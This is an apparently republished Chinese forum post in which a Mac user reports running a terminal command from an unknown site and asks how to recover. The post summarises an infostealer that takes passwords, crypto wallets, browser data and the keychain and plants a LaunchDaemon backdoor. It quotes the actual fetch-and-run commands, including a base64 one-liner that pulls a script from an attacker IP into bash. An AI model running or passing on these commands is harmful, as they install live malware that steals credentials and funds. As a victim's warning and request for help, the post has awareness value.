V2EX 10月19日 04:37
Mac 用户执行未知终端命令,面临密码、加密货币和个人信息泄露风险
index_new5.html
../../../zaker_core/zaker_tpl_static/wap/tpl_guoji1.html

 

一位 Mac 用户在周末尝试新软件时,误执行了一个来自不明网站的终端命令。该命令通过 curl 和 base64 解码后,实际执行了一个远程脚本,该脚本旨在窃取用户的密码、加密货币钱包(包括浏览器插件和桌面应用)、各类浏览器数据(登录凭据、Cookies、信用卡信息)、系统钥匙串、备忘录内容以及桌面和文稿中的敏感文件。窃取的信息会被打包上传至黑客服务器,并可能植入持久化后门,甚至尝试替换正版的加密货币钱包应用。此事件揭示了执行未知命令的严重安全隐患,并引发了用户对数据安全的担忧。

⚠️ **密码窃取与账户欺骗**:该恶意脚本会弹出一个伪造的系统对话框,谎称需要安装“应用助手”,以诱骗用户输入电脑的开机密码。一旦输入,该密码便会被窃取,并可能导致对话框持续骚扰用户。

💰 **加密货币钱包全面攻击**:脚本的主要目标是加密货币钱包。它会扫描并窃取数十种浏览器钱包插件(如 MetaMask、Phantom、Trust Wallet)的数据,同时也会搜寻并窃取电脑上安装的桌面钱包程序(如 Exodus、Atomic、Ledger Live、Coinomi、Electrum)的数据。

🌐 **多浏览器数据大规模抓取**:该脚本能攻击市面上几乎所有的主流浏览器(Chrome、Safari、Firefox、Edge、Brave、Opera等),窃取保存的登录名和密码、Cookies、浏览历史记录以及信用卡信息,从而可能导致各类在线账户被盗用。

📂 **敏感个人文件及系统信息泄露**:脚本还会复制整个系统的钥匙串文件(包含 Wi-Fi 和应用密码等)、提取备忘录应用内的所有文字内容,并专门扫描“桌面”和“文稿”文件夹,搜寻并复制 .pdf、.docx、.txt、.wallet、.key 等敏感文件。

🚪 **持久化后门植入与程序替换**:通过用户输入的密码,脚本会在系统中创建一个启动守护进程(LaunchDaemon),确保即使电脑重启,恶意软件也能自动运行,为黑客提供持续的控制权。此外,它还会尝试用从黑客服务器下载的恶意版本替换用户电脑上正版的 Ledger Live 加密钱包应用。

趁周末没事折腾了一下自己的 Mac ,下了一堆乱七八糟的软件

刚刚有个网站给了我一个命令,要在终端执行。命令是 /bin/bash -c "$(curl -fsSL shoter.org/c/maxx2)"

感觉是熬夜脑子不清醒了,我真就傻乎乎输入密码执行了脚本,听到 mac 一阵叮叮钉钉的提示音才感觉不对劲

看了一下这个命令实际执行的是 echo "Y3VybCAtcyBodHRwOi8vMTg1LjkzLjg5LjYyL2QvYm9zczU0MjM1IHwgbm9odXAgYmFzaCAm" | base64 -d | bash 会对应执行 http://185.93.89.62/d/boss54235 这上面的脚本

看到这个命令的时候,脑子都凉了,把脚本喂给 Gemini 告诉我说会去执行以下命令

    窃取密码 🔑它会弹出一个伪造的系统对话框,谎称“需要安装应用助手”,诱骗你输入电脑的开机密码。如果你不输入正确的密码,这个对话框会一直骚扰你。

    窃取加密货币钱包 💰 (主要目标)浏览器钱包: 它有一个庞大的列表,专门扫描并窃取数十种加密货币钱包浏览器插件的数据,例如 MetaMask 、Phantom 、Trust Wallet 等。

桌面钱包: 它还会扫描并窃取你电脑上安装的桌面钱包程序数据,例如 Exodus, Atomic, Ledger Live, Coinomi, Electrum 等。

    窃取各类浏览器数据 🌐它会攻击市面上几乎所有的主流浏览器( Chrome, Safari, Firefox, Edge, Brave, Opera 等)。

窃取内容包括:保存的登录名和密码、Cookies (可以用来登录你的账户)、历史记录、信用卡信息等。

    窃取个人敏感文件 📄钥匙串 (Keychain): 复制你整个系统钥匙串文件,里面可能包含你的 Wi-Fi 密码、应用密码等。

备忘录 (Notes): 提取你“备忘录”应用里的所有文字内容。

本地文件: 扫描你的“桌面”和“文稿”文件夹,专门寻找 .pdf, .docx, .txt, .wallet, .key 等敏感文件并进行复制。

    打包上传,发送给黑客 📤它会将以上窃取到的所有信息打包成一个 .zip 压缩文件。

然后将这个文件上传到黑客的服务器( IP 地址为 185.93.89.62 ,和你之前那个脚本是同一个地址)。

    植入后门并替换正常程序 🚪持久化后门: 它会用你输入的密码,在系统里创建一个启动守护进程 (LaunchDaemon)。这意味着即时你重启电脑,这个恶意软件也会自动运行,让黑客可以持续控制你的电脑。

程序木马化: 它会尝试用一个从黑客服务器下载的恶意版本来替换你电脑上正版的 Ledger Live 加密钱包应用。

这个是不是只能重装系统了?我还要做什么来保护自己的账户吗

Fish AI Reader

Fish AI Reader

AI辅助创作,多种专业模板,深度分析,高质量内容生成。从观点提取到深度思考,FishAI为您提供全方位的创作支持。新版本引入自定义参数,让您的创作更加个性化和精准。

FishAI

FishAI

鱼阅,AI 时代的下一个智能信息助手,助你摆脱信息焦虑

联系邮箱 441953276@qq.com

相关标签

Mac安全 终端命令 恶意软件 加密货币安全 密码窃取 数据泄露 网络安全 脚本攻击 Mac Security Terminal Command Malware Cryptocurrency Security Password Theft Data Leakage Cybersecurity Script Attack
相关文章